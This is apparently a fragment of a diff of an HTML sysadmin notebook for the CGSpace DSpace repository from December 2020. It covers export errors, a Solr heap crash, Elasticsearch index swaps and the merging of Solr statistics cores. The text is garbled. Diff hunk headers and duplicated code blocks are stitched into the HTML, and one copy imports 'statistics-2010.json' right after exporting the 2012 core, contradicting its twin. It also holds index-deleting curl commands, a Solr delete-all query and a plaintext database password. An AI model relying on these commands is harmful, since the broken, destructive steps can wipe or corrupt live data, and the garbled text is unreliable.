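</ul>
<pre tabindex="0"><code>$ grep -c 'Multiple update components target the same field' /path/to/tomcat/logs/catalina.out
</code></pre>
<ul>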
<li>I sent the full stack to Atmire to investigate
<ul>
<li>I know we&rsquo;ve had this &ldquo;Multiple update components target the same field&rdquo; error in the past with DSpace 5.x and Atmire said it was harmless, but would nevertheless be fixed in a future update</li>
</li>
<li>I was trying to export the ILRI community on CGSpace so I could update one of the ILRI author&rsquo;s names, but it throws an error&hellip;</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ dspace metadata-export -i 10568/1 -f /tmp/2020-12-17-ILRI.csv
Loading @mire database changes for module MQM
Changes have been processed
Exporting community &#39;International Livestock Research Institute (ILRI)&#39; (10568/1)
Exception: null
java.lang.NullPointerException
at com.google.common.base.Preconditions.checkNotNull(Preconditions.java:212)
at com.google.common.collect.Iterators.concat(Iterators.java:464)
at org.dspace.app.bulkedit.MetadataExport.addItemsToResult(MetadataExport.java:136)
at org.dspace.app.bulkedit.MetadataExport.buildFromCommunity(MetadataExport.java:125)
at org.dspace.app.bulkedit.MetadataExport.&lt;init&gt;(MetadataExport.java:77)
at org.dspace.app.bulkedit.MetadataExport.main(MetadataExport.java:282)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace metadata-export -i 10568/1 -f /tmp/2020-12-17-ILRI.csv
</span></span><span style="display:flex;"><span>Loading @mire database changes for module MQM
</span></span><span style="display:flex;"><span>Changes have been processed
</span></span><span style="display:flex;"><span>Exporting community &#39;International Livestock Research Institute (ILRI)&#39; (10568/1)
</span></span><span style="display:flex;"><span> Exception: null
</span></span><span style="display:flex;"><span>java.lang.NullPointerException
</span></span><span style="display:flex;"><span> at com.google.common.base.Preconditions.checkNotNull(Preconditions.java:212)
</span></span><span style="display:flex;"><span> at com.google.common.collect.Iterators.concat(Iterators.java:464)
</span></span><span style="display:flex;"><span> at org.dspace.app.bulkedit.MetadataExport.addItemsToResult(MetadataExport.java:136)
</span></span><span style="display:flex;"><span> at org.dspace.app.bulkedit.MetadataExport.buildFromCommunity(MetadataExport.java:125)
</span></span><span style="display:flex;"><span> at org.dspace.app.bulkedit.MetadataExport.&lt;init&gt;(MetadataExport.java:77)
</span></span><span style="display:flex;"><span> at org.dspace.app.bulkedit.MetadataExport.main(MetadataExport.java:282)
</span></span><span style="display:flex;"><span> at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
</span></span><span style="display:flex;"><span> at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
</span></span><span style="display:flex;"><span> at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
</span></span><span style="display:flex;"><span> at java.lang.reflect.Method.invoke(Method.java:498)
</span></span><span style="display:flex;"><span> at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
</span></span><span style="display:flex;"><span> at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
</span></span></code></pre></div><ul>
<li>I did it via CSV with <code>fix-metadata-values.py</code> instead:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat 2020-12-17-update-ILRI-author.csv
dc.contributor.author,correct
&#34;Padmakumar, V.P.&#34;,&#34;Varijakshapanicker, Padmakumar&#34;
$ ./fix-metadata-values.py -i 2020-12-17-update-ILRI-author.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f dc.contributor.author -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">3</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2020-12-17-update-ILRI-author.csv
</span></span><span style="display:flex;"><span>dc.contributor.author,correct
</span></span><span style="display:flex;"><span>&#34;Padmakumar, V.P.&#34;,&#34;Varijakshapanicker, Padmakumar&#34;
</span></span><span style="display:flex;"><span>$ ./fix-metadata-values.py -i 2020-12-17-update-ILRI-author.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f dc.contributor.author -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">3</span>
</span></span></code></pre></div><ul>
<li>Abenet needed a list of all 2020 outputs from the Livestock CRP that were Limited Access
<ul>
<li>I exported the community from CGSpace and used <code>csvcut</code> and <code>csvgrep</code> to get a list:</li>
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ csvcut -c 'dc.identifier.citation[en_US],dc.identifier.uri,dc.identifier.uri[],dc.identifier.uri[en_US],dc.date.issued,dc.date.issued[],dc.date.issued[en_US],cg.identifier.status[en_US]' ~/Downloads/10568-80099.csv | csvgrep -c 'cg.identifier.status[en_US]' -m 'Limited Access' | csvgrep -c 'dc.date.issued' -m 2020 -c 'dc.date.issued[]' -m 2020 -c 'dc.date.issued[en_US]' -m 2020 &gt; /tmp/limited-2020.csv
<pre tabindex="0"><code>$ csvcut -c &#39;dc.identifier.citation[en_US],dc.identifier.uri,dc.identifier.uri[],dc.identifier.uri[en_US],dc.date.issued,dc.date.issued[],dc.date.issued[en_US],cg.identifier.status[en_US]&#39; ~/Downloads/10568-80099.csv | csvgrep -c &#39;cg.identifier.status[en_US]&#39; -m &#39;Limited Access&#39; | csvgrep -c &#39;dc.date.issued&#39; -m 2020 -c &#39;dc.date.issued[]&#39; -m 2020 -c &#39;dc.date.issued[en_US]&#39; -m 2020 &gt; /tmp/limited-2020.csv
</code></pre><h2 id="2020-12-18">2020-12-18</h2>
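<ul>
<li>csvkit can count the resulting rows directly (a sketch):</li>
</ul>
<pre tabindex="0"><code>$ csvstat --count /tmp/limited-2020.csv
</code></pre>
<h2 id="2020-12-18">2020-12-18</h2>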
<ul>
<li>I added support for indexing community views and downloads to <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a>
<ul>
<li>The DeduplicateValuesProcessor has been running on DSpace Test for the last two days and almost completed its second twelve-hour run, but crashed near the end:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">...
Run 1 — 100% — 8,230,000/8,239,228 docs — 39s — 9h 8m 31s
Exception: Java heap space
java.lang.OutOfMemoryError: Java heap space
at java.util.Arrays.copyOfRange(Arrays.java:3664)
at java.lang.String.&lt;init&gt;(String.java:207)
at org.noggit.CharArr.toString(CharArr.java:164)
at org.apache.solr.common.util.JavaBinCodec.readStr(JavaBinCodec.java:599)
at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:180)
at org.apache.solr.common.util.JavaBinCodec.readArray(JavaBinCodec.java:492)
at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:186)
at org.apache.solr.common.util.JavaBinCodec.readSolrDocument(JavaBinCodec.java:360)
at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:219)
at org.apache.solr.common.util.JavaBinCodec.readArray(JavaBinCodec.java:492)
at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:186)
at org.apache.solr.common.util.JavaBinCodec.readSolrDocumentList(JavaBinCodec.java:374)
at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:221)
at org.apache.solr.common.util.JavaBinCodec.readOrderedMap(JavaBinCodec.java:125)
at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:188)
at org.apache.solr.common.util.JavaBinCodec.unmarshal(JavaBinCodec.java:116)
at org.apache.solr.client.solrj.impl.BinaryResponseParser.processResponse(BinaryResponseParser.java:43)
at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:528)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
at org.apache.solr.client.solrj.request.QueryRequest.process(QueryRequest.java:91)
at org.apache.solr.client.solrj.SolrServer.query(SolrServer.java:301)
at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.getNextSetOfSolrDocuments(SourceFile:392)
at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.performRun(SourceFile:157)
at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.update(SourceFile:128)
at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI.main(SourceFile:78)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>Run 1 — 100% — 8,230,000/8,239,228 docs — 39s — 9h 8m 31s
</span></span><span style="display:flex;"><span>Exception: Java heap space
</span></span><span style="display:flex;"><span>java.lang.OutOfMemoryError: Java heap space
</span></span><span style="display:flex;"><span> at java.util.Arrays.copyOfRange(Arrays.java:3664)
</span></span><span style="display:flex;"><span> at java.lang.String.&lt;init&gt;(String.java:207)
</span></span><span style="display:flex;"><span> at org.noggit.CharArr.toString(CharArr.java:164)
</span></span><span style="display:flex;"><span> at org.apache.solr.common.util.JavaBinCodec.readStr(JavaBinCodec.java:599)
</span></span><span style="display:flex;"><span> at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:180)
</span></span><span style="display:flex;"><span> at org.apache.solr.common.util.JavaBinCodec.readArray(JavaBinCodec.java:492)
</span></span><span style="display:flex;"><span> at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:186)
</span></span><span style="display:flex;"><span> at org.apache.solr.common.util.JavaBinCodec.readSolrDocument(JavaBinCodec.java:360)
</span></span><span style="display:flex;"><span> at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:219)
</span></span><span style="display:flex;"><span> at org.apache.solr.common.util.JavaBinCodec.readArray(JavaBinCodec.java:492)
</span></span><span style="display:flex;"><span> at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:186)
</span></span><span style="display:flex;"><span> at org.apache.solr.common.util.JavaBinCodec.readSolrDocumentList(JavaBinCodec.java:374)
</span></span><span style="display:flex;"><span> at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:221)
</span></span><span style="display:flex;"><span> at org.apache.solr.common.util.JavaBinCodec.readOrderedMap(JavaBinCodec.java:125)
</span></span><span style="display:flex;"><span> at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:188)
</span></span><span style="display:flex;"><span> at org.apache.solr.common.util.JavaBinCodec.unmarshal(JavaBinCodec.java:116)
</span></span><span style="display:flex;"><span> at org.apache.solr.client.solrj.impl.BinaryResponseParser.processResponse(BinaryResponseParser.java:43)
</span></span><span style="display:flex;"><span> at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:528)
</span></span><span style="display:flex;"><span> at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
</span></span><span style="display:flex;"><span> at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
</span></span><span style="display:flex;"><span> at org.apache.solr.client.solrj.request.QueryRequest.process(QueryRequest.java:91)
</span></span><span style="display:flex;"><span> at org.apache.solr.client.solrj.SolrServer.query(SolrServer.java:301)
</span></span><span style="display:flex;"><span> at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.getNextSetOfSolrDocuments(SourceFile:392)
</span></span><span style="display:flex;"><span> at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.performRun(SourceFile:157)
</span></span><span style="display:flex;"><span> at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.update(SourceFile:128)
</span></span><span style="display:flex;"><span> at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI.main(SourceFile:78)
</span></span><span style="display:flex;"><span> at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
</span></span><span style="display:flex;"><span> at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
</span></span><span style="display:flex;"><span> at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
</span></span><span style="display:flex;"><span> at java.lang.reflect.Method.invoke(Method.java:498)
</span></span><span style="display:flex;"><span> at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
</span></span><span style="display:flex;"><span> at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
</span></span></code></pre></div><ul>
<li>That was with a JVM heap of 512m</li>
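<li>A hedged mitigation is to give the CLI a bigger heap and re-run it; the <code>dspace</code> launcher script respects <code>JAVA_OPTS</code>, and the stack trace names the Atmire updater class, so a sketch (the exact invocation and heap size are assumptions) would be:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&#39;-Xmx2048m -Dfile.encoding=UTF-8&#39;
$ dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI
</code></pre><ul>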
<li>I looked in Solr and found dozens of duplicates of each field again&hellip;
<ul>
@ -744,30 +744,30 @@ java.lang.OutOfMemoryError: Java heap space
<li>The AReS harvest finished this morning and I moved the Elasticsearch index manually</li>
<li>First, check the number of records in the temp index to make sure it seems complete and doesn&rsquo;t contain duplicated data:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 100135,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 100135,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><ul>
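<li>For a quicker comparison of the temp and live counts, one can (assuming <code>jq</code> is installed) extract just the numbers:</li>
</ul>
<pre tabindex="0"><code>$ curl -s &#39;http://localhost:9200/openrxv-items-temp/_count?q=*&#39; | jq .count
$ curl -s &#39;http://localhost:9200/openrxv-items/_count?q=*&#39; | jq .count
</code></pre><ul>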
<li>Then delete the old backup and clone the current items index as a backup:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2020-12-14?pretty&#39;</span>
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2020-12-21
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2020-12-14?pretty&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2020-12-21
</span></span></code></pre></div><ul>
<li>Then delete the current items index and clone it from temp:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items?pretty&#39;</span>
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</code></pre></div><h2 id="2020-12-22">2020-12-22</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items?pretty&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</span></span></code></pre></div><h2 id="2020-12-22">2020-12-22</h2>
<ul>
<li>I finished getting the Swagger UI integrated into the dspace-statistics-api
<ul>
@ -810,10 +810,10 @@ $ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp
</code></pre><ul>
<li>I exported the 2012 stats from the year core and imported them to the main statistics core with solr-import-export-json:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ chrt -b <span style="color:#ae81ff">0</span> ./run.sh -s http://localhost:8081/solr/statistics-2012 -a export -o statistics-2012.json -k uid
$ chrt -b <span style="color:#ae81ff">0</span> ./run.sh -s http://localhost:8081/solr/statistics -a import -o statistics-2012.json -k uid
$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2012/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:*&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> ./run.sh -s http://localhost:8081/solr/statistics-2012 -a export -o statistics-2012.json -k uid
</span></span><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> ./run.sh -s http://localhost:8081/solr/statistics -a import -o statistics-2010.json -k uid
</span></span><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2012/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:*&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</span></span></code></pre></div><ul>
<li>I decided to do the same for the remaining 2011, 2014, 2017, and 2019 cores&hellip;</li>
</ul>
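<ul>
<li>A loop makes that less error-prone; a sketch assuming the same <code>run.sh</code> invocation and core naming as above:</li>
</ul>
<pre tabindex="0"><code>$ for year in 2011 2014 2017 2019; do
  chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics-$year -a export -o statistics-$year.json -k uid
  chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics -a import -o statistics-$year.json -k uid
  curl -s &#34;http://localhost:8081/solr/statistics-$year/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#34;&lt;delete&gt;&lt;query&gt;*:*&lt;/query&gt;&lt;/delete&gt;&#34;
done
</code></pre>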
<h2 id="2020-12-29">2020-12-29</h2>
@ -824,31 +824,31 @@ $ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 100135,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp?pretty&#39;</span>
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2020-12-29
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</code></pre></div><h2 id="2020-12-30">2020-12-30</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 100135,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp?pretty&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2020-12-29
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</span></span></code></pre></div><h2 id="2020-12-30">2020-12-30</h2>
<ul>
<li>The indexing on AReS finished so I cloned the <code>openrxv-items-temp</code> index to <code>openrxv-items</code> and deleted the backup index:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items?pretty&#39;</span>
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp?pretty&#39;</span>
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2020-12-29?pretty&#39;</span>
</code></pre></div><!-- raw HTML omitted -->
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items?pretty&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp?pretty&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2020-12-29?pretty&#39;</span>
</span></span></code></pre></div><!-- raw HTML omitted -->
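<ul>
<li>Since this backup-and-swap dance recurs after every harvest, it could be wrapped in a small script; a sketch assuming the same localhost Elasticsearch and index names:</li>
</ul>
<pre tabindex="0"><code>#!/usr/bin/env bash
# sketch: promote openrxv-items-temp to openrxv-items after a good harvest
ES=http://localhost:9200
TODAY=$(date +%Y-%m-%d)
# freeze the live index and keep a dated backup clone
curl -s -X PUT &#34;$ES/openrxv-items/_settings&#34; -H &#39;Content-Type: application/json&#39; -d&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;
curl -s -X POST &#34;$ES/openrxv-items/_clone/openrxv-items-$TODAY&#34;
# replace the live index with the freshly harvested temp one
curl -s -XDELETE &#34;$ES/openrxv-items&#34;
curl -s -X PUT &#34;$ES/openrxv-items-temp/_settings&#34; -H &#39;Content-Type: application/json&#39; -d&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;
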